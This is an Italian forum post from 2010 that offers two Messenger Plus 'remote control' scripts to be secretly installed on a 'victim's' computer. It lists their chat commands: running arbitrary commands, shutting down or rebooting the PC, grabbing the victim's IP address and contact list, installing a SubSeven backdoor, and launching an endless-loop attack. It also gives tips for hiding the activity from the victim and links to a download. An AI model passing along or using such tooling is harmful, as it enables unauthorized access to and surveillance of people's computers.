Scripts di controllo remoto, Senza Messenger Plus non potete fare nulla.

« Older   Newer »
  Share  
nagato aka pain
view post Posted on 20/1/2010, 19:40     +1   -1




Il contenuto di questo post è a scopo informativo,non mi assumo nessuna responsabilità dell'uso che farete dei tools.



Eccovi i migliori script per il controllo remoto per Messenger,ricordate che dovete avere installato Messener Live Plus,anche la "vittima" dovrà averlo,altrimenti non se ne fa nulla.

Eccoli qui:
hackbooster

SPOILER (click to view)
Lo script forse già lo conoscete,in breve serve a fare "scherzi" con msn solo facendo installare questo script alla "vittima", voi nn dovete installare niente...

comandi:
- * txt = modifica il messaggio personale;
- ** txt = modifica il messaggio personale e nn permette la modifica (s disattiva se viene inviato il comando *);
- % txt = modifica il nick;
- st + numero(compresi tra 1 e 9 )= modifica lo stato esempio: st 2 (il contatto diventa invisibile);
- & txt = crea nel pc della vittima un messaggio toast con all' interno il vostro testo (\n x andare a capo);
- info! = da informazioni sulla versione di msn e da anche la lista contatti della vittima
- lockmsn! = blocca msn (l'utente può sbloccarlo);
-closemsn! = disconnette il contatto
- ex "comando" = esegui comandi sul pc della vittima!
esempio aprire un file :
ex C:\WINDOWS\system32\cmd.exe oppure cmd
-op "email" = apre una conversazione con il contatto che ha quella mail, deve essere x forza nella lista dell vittima;
-add "email" = aggiunge un contatto alla vittima, ma rikiede la conferma;
-Convo! = (rispettate la maiuscola) inserisce un pacchetto rar nella vostra cartella condivisa;
-Convo2! = genera un file, ke successivamente con il comando send! può essere inviato direttamente tramite la chat qst comando
quindi è visibile provando con lockmsn! xò si potrebbe anke nn essere scoperti, ma l'invio potrebbe essere interrotto.
-log! = nel caso il contenuto del pacchetto ottenuto dai comandi convo sia nullo qst comando serve ad abilitare la cronologia del plus;
-close! = chiude la chat in corso (utile nel caso usate il comando)


ScriptHack

SPOILER (click to view)
ISTRUZIONI
Fare installare EMH Script alla vittima.
Usare una delle funzioni.
Per fare ciò basta scrivere il messaggio corrispondente alla vittima.

FUNZIONI
adessotidisconnetti - disconnette la vittima.
spegnitiingenuo - il PC della vittima si spegne.
seiunlamer? - la vittima risponde "Si, sono uno stupido lamer!".
controlloiltuopc? - la vittima risponde "Si, sono il tuo umile servo!"
installaunaporta - installa alla vittima un server di SubSeven.
riavviaingenuo - il PC della vittima si riavvia.
vaiinfinitedos - :lol, @start, goto lol
controllototale - appare "Controlliamo il tuo PC!" sul PC della vittima.
muahahah - appare la finestra Muahahah.
rilevalip - Ricevi l'indirizzo IP della vittima.
rilevalaver - Ricevi versione di Msn, MsgPlus! e Windows della vittima


Mi raccomando fateli importare solo alla vittima e poi nella chat inserire i comandi...
Io vi consiglio prima di fargli installare booster poi l'altro...
il perchè è semplice:

Quando mettete un ordine da remoto nella chat dell altro compare (molto sospettoso)
quindi dopo ogni messaggio inserite il comando"!close"senza le virgolette,quindi si chiuderà la finestra con cui lui sta chattando con voi.

SPOILER (click to view)
ovviamente questi sono miei consigli...voi siete liberi di fare tutto ciò che volete...a dimenticavo:

Anche se lo scopo di questi script è lamerare...fatelo solo se vi dovete vendicare...anzi non fatelo proprio...sempre mio consiglio poi fate voi...


A presto!

CITAZIONE
Fonte:me & LordTittis3000

Download:Scripts di controlo remoto.
 
Top
0 replies since 20/1/2010, 19:40   26 views
  Share